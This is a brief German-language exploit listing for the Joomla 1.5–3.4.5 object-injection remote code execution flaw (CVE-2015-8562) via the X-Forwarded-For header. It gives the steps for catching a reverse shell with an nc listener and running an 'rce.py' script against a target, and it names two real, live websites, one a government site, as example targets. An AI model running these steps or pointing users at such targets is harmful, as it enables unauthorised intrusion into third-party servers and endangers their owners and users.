
Joomla 1.5 - 3.4.5 Object Injection RCE X-Forwarded-For-Header
Exploit: Joomla 1.5 - 3.4.5 Object Injection RCE X-Forwarded-For-Header:
Vuln-Datum: 17.12.2015
Exploit-Autor: anarc0der
Version: Joomla 1.5 bis 3.4.5
CVE: CVE-2015-8562
So geht's:
Öffnen Sie ein Terminal und lauschen Sie mit nc: $ nc -lnvp 4444
Öffnen Sie ein weiteres Terminal und führen Sie den Exploit aus:
python3 rce.py --target='target' --ip='ip' --port=4444
Beispiel-Ziele für den PoC (Fassen Sie sie nicht an, andere Personen nutzen sie als Beispiel):
http://www.monitoraggiograduatorie.gov.it/
http://budo-aykac.nl/